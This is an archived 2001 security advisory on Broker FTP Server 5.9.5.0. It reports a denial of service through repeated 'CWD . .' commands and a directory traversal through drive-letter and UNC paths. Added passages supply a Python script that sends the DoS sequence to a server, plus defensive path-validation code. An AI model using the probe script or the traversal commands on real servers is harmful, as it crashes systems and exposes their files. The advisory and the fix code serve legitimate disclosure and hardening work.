Broker FTP Server 5.9.5.0 Buffer Overflow / DoS / Directory Traversal

From: ByteRage (byterageat_private)
Date: Sun Jun 10 2001 - 01:38:04 PDT


    TESTED ON
    
    Broker FTP Server 5.9.5.0 on Windows 98, likely to
    work on NT / 2k 
    
    DESCRIPTION
    
    1) Buffer Overflow / DoS
    
    The DoS, which completely freezes the victim machine,
    can be triggered by repeatedly sending the following
    command (after logging in):
    
    CWD . .
    (CD ". ." with an FTP client)
    
    or, even better, by adding more spaces between the
    dots:
    
    CWD .                                                .
    
    The server treats these components as valid directory
    names and appends them to the current path; once the
    path has grown past some bound the server locks up.
    (I think you have to repeat the last one about 30
    times or so...)
    
    I have attached the script brokerdos.pl which
    automates this.
    
    Maybe I'm getting delusional, but I have once been
    able to make Broker FTP Server crash this way with
    EIP set to something like "  .\" (and my SoftICE
    popped up), so this buffer overflow might be
    exploitable... I have not been able to reproduce this
    situation afterwards, though.
    
    Also, the file at C:\Program Files\TransSoft
    Ltd\Broker 5\Data\Errors.log gave me access violations
    at offsets that were definitely taken from the input
    string (like 20202020, 2020202E, etc.).
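    The script below is an added example, not the
    brokerdos.pl attached to the original post (which is
    not reproduced in this archive). It builds the CWD
    lines described above and sends them over ftplib,
    checking every reply: a 2xx reply means the server
    accepted the bogus component, a 4xx/5xx reply means
    it refused it, and a timeout or dropped connection
    part-way through is the DoS symptom. Host, port,
    credentials and the 40-space width are assumptions.
    For reference, 0x20 is a space and 0x2E a dot, so the
    values 20202020 and 2020202E in the error log are the
    bytes of the probe itself. ftplib's cwd() rewrites
    ".." into CDUP, so the raw line is sent with
    sendcmd() instead.

```python
"""Reproduce the Broker FTP CWD probe described above (added example)."""
import socket
import sys
from ftplib import FTP, error_perm, error_reply, error_temp


def build_probe(repeats=30, spaces=1):
    """Return the CWD lines the advisory describes: a dot, `spaces` spaces,
    a dot.  spaces=1 gives the 'CWD . .' form, a larger value the long form.
    """
    if repeats < 1 or spaces < 1:
        raise ValueError("repeats and spaces must be >= 1")
    return ["CWD ." + " " * spaces + "."] * repeats


def run_probe(host, port=21, user="anonymous", password="probe@example.invalid",
              repeats=30, spaces=40, timeout=15):
    """Log in, send the probe lines one at a time and report what happened.

    Host, credentials and widths are assumed values for illustration.
    Returns a dict; server behaviour never raises, only local misuse does.
    """
    result = {"sent": 0, "outcome": None, "last_pwd": None}
    ftp = FTP(timeout=timeout)
    try:
        ftp.connect(host, port)
        ftp.login(user, password)
        for line in build_probe(repeats, spaces):
            ftp.sendcmd(line)              # raises error_perm/error_temp on 4xx/5xx
            result["sent"] += 1
            # PWD shows the path growing by one component per accepted line
            result["last_pwd"] = ftp.sendcmd("PWD")
        result["outcome"] = "accepted all lines, server still responding"
    except (error_perm, error_temp, error_reply) as exc:
        result["outcome"] = f"server refused line {result['sent'] + 1}: {exc}"
    except (socket.timeout, EOFError, OSError) as exc:
        result["outcome"] = (f"connection failed or server unresponsive "
                             f"after {result['sent']} lines: {exc!r}")
    finally:
        try:
            ftp.close()
        except OSError:
            pass
    return result


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    print(run_probe(target))
```

    Run it as "python probe.py <host>" against a test
    machine only; a growing "last_pwd" followed by an
    "unresponsive" outcome is the behaviour the advisory
    reports.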
    
    2) Directory Traversal
    
    You can map out the contents of every drive available
    to the system in the following manner. (You don't
    seem to be able to upload or download files through
    it, though.)
    
    To leave the home directory, type the following in
    your FTP client (the client's CD sends a CWD command):
    
    CD C: or CD C:\
    
    (You can also go to the A: drive with CD A:, and
    likewise to CD-ROM and network drives.) Now you can
    list the contents of the drive with the FTP client:
    
    LS
    
    and dive into subdirectories with something like:
    
    CD C:\WINDOWS\
    
    etc. It is also possible to traverse out of the home
    directory using UNC pathnames (starting with \\),
    which might be used to reach local shares remotely.
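    The following is an added example, not Broker's code:
    it shows the check a CWD handler on Windows needs so
    that both findings above are closed at once. The
    argument is resolved against a virtual root kept as a
    list of components, so a drive letter, a UNC prefix
    or a ".." that climbs above the root is refused, and
    any name Windows would silently rewrite (trailing
    dots or spaces, including the ". ." and ".   ."
    components from section 1) is refused rather than
    appended to the path. The depth cap MAX_DEPTH and the
    reply texts are assumptions; ntpath is used so the
    Windows path semantics can be exercised on any host.

```python
"""Server-side CWD handling against a fixed home root (added example)."""
import ntpath
import re

MAX_DEPTH = 32          # assumed cap on components below the root
MAX_COMPONENT = 255     # longest single name Windows allows
_SEP = re.compile(r"[\\/]")


class PathError(ValueError):
    """A CWD argument the server must refuse with a 550 reply."""


def apply_cwd(current, arg):
    """Apply CWD `arg` to the virtual directory `current` (a list of
    components below the home root) and return the new list, or raise
    PathError.  The real disk path is never touched here, so neither a
    drive letter nor a UNC prefix can reach anything outside the root.
    """
    drive, _ = ntpath.splitdrive(arg)
    if drive or arg.startswith(("\\\\", "//")):
        raise PathError("absolute drive or UNC path refused")
    # A leading separator restarts from the virtual root, not from C:\.
    new = [] if arg[:1] in ("\\", "/") else list(current)
    for comp in _SEP.split(arg):
        if comp in ("", "."):
            continue                      # '//' and '.' are no-ops
        if comp == "..":
            if not new:
                raise PathError("cannot climb above the root")
            new.pop()
            continue
        if ":" in comp:
            raise PathError("':' not allowed in a directory name")
        # Windows drops trailing dots and spaces when opening a name, so
        # ' .', '. .' and '.   .' would all be rewritten on disk.  Refusing
        # any name the filesystem would rewrite keeps the virtual path and
        # the real path in agreement and never appends such a component.
        name = comp.rstrip(" .")
        if name == "":
            raise PathError("name consists only of dots and spaces")
        if name != comp:
            raise PathError("trailing dots or spaces refused")
        if len(name) > MAX_COMPONENT:
            raise PathError("name too long")
        new.append(name)
        if len(new) > MAX_DEPTH:          # bounded growth, no runaway path
            raise PathError("directory too deep")
    return new


def real_path(home, virtual):
    """Map a virtual directory onto the disk path under `home`, and check
    again with ntpath that the result is still inside `home`."""
    home = ntpath.normpath(home)
    path = ntpath.normpath(ntpath.join(home, *virtual))
    if ntpath.commonpath([home, path]) != home:
        raise PathError("resolved path escaped the root")
    return path


def cwd_reply(current, arg):
    """Reply the server should send: (new_dir, '250 ...') on success, or
    (current, '550 <reason>') when the argument is refused."""
    try:
        new = apply_cwd(current, arg)
    except PathError as exc:
        return current, f"550 {exc}"
    return new, "250 CWD command successful"
```

    The same apply_cwd() check has to run on the argument
    of LIST, RETR and STOR as well, otherwise "LIST C:\"
    reopens the hole that CWD just closed; real_path() is
    the second, independent check that the disk path the
    server is about to open still lies under the home
    directory.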
    
    VENDOR STATUS
    
    I have sent this advisory to <supportat_private>
    
    You can get the updated advisory at
    http://elf.box.sk/byterage/adv7.htm
    
    ======================================================
    [ByteRage] <byterageat_private> [www.byterage.cjb.net]
    ======================================================
    
    
    



    This archive was generated by hypermail 2b30 : Sun Jun 10 2001 - 13:20:51 PDT